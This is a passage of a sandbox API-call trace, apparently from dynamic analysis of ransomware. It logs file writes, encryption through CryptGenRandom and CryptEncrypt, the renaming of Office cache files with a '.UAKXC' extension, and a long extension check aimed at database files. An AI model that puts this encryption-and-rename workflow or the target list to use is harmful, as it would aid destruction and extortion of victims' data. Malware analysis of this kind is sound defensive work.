(in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.718] WriteFile (in: hFile=0x6f0, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0147.779] WriteFile (in: hFile=0x6f0, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0147.779] SetEndOfFile (hFile=0x6f0) returned 1 [0147.779] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.780] ReadFile (in: hFile=0x6f0, lpBuffer=0x4610000, nNumberOfBytesToRead=0x5aa, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x5aa, lpOverlapped=0x0) returned 1 [0147.780] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.780] WriteFile (in: hFile=0x6f0, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x5aa, lpOverlapped=0x0) returned 1 [0147.780] CloseHandle (hObject=0x6f0) returned 1 [0147.781] GetProcessHeap () returned 0xea0000 [0147.781] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0147.781] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" [0147.781] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.UAKXC" [0147.781] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.uakxc")) returned 1 [0147.782] GetProcessHeap () returned 0xea0000 [0147.782] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0147.782] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef12b8 | out: hHeap=0xea0000) returned 1 [0147.782] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0147.782] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0147.782] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0147.782] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0147.783] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab")) returned 0x2020 [0147.873] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0147.873] GetLastError () returned 0x0 [0147.873] GetFileSizeEx (in: hFile=0x714, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=70361744) returned 1 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".4dd") returned 0x0 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".4dl") returned 0x0 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".accdb") returned 0x0 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".accdc") returned 0x0 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".accde") returned 0x0 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".accdr") returned 0x0 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".accdt") returned 0x0 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".accft") returned 0x0 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".adb") returned 0x0 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ade") returned 0x0 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".adf") returned 0x0 [0147.873] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".adp") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".arc") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ora") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".alf") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ask") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".btr") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".bdf") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".cat") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".cdb") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ckp") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".cma") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".cpd") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dacpac") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dad") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dadiagrams") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".daschema") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".db") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".db-shm") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".db-wal") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".db3") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dbc") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dbf") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dbs") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dbt") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dbv") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dbx") returned 0x0 [0147.874] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dcb") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dct") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dcx") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ddl") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dlis") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dp1") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dqy") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dsk") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dsn") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dtsx") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".dxl") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".eco") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ecx") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".edb") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".epim") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".exb") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fcd") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fdb") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fic") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fmp") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fmp12") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fmpsl") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fol") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fp3") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fp4") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fp5") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fp7") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fpt") returned 0x0 [0147.875] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".frm") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".gdb") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".grdb") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".gwi") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".hdb") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".his") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ib") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".idb") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ihx") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".itdb") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".itw") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".jet") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".jtx") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".kdb") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".kexi") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".kexic") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".kexis") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".lgc") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".lwx") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".maf") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".maq") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".mar") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".mas") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".mav") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".mdb") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".mdf") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".mpd") returned 0x0 [0147.876] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".mrg") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".mud") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".mwb") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".myd") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ndf") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".nnt") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".nrmlib") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ns2") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ns3") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".ns4") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".nsf") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".nv") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".nv2") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".nwdb") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".nyf") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".odb") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".oqy") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".orx") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".owc") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".p96") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".p97") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".pan") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".pdb") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".pdm") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".pnz") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".qry") returned 0x0 [0147.877] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".qvd") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".rbf") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".rctd") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".rod") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".rodx") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".rpd") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".rsd") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".sas7bdat") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".sbf") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".scx") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".sdb") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".sdc") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".sdf") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".sis") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".spq") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".sql") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".sqlite") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".sqlite3") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".sqlitedb") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".te") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".temx") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".tmd") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All 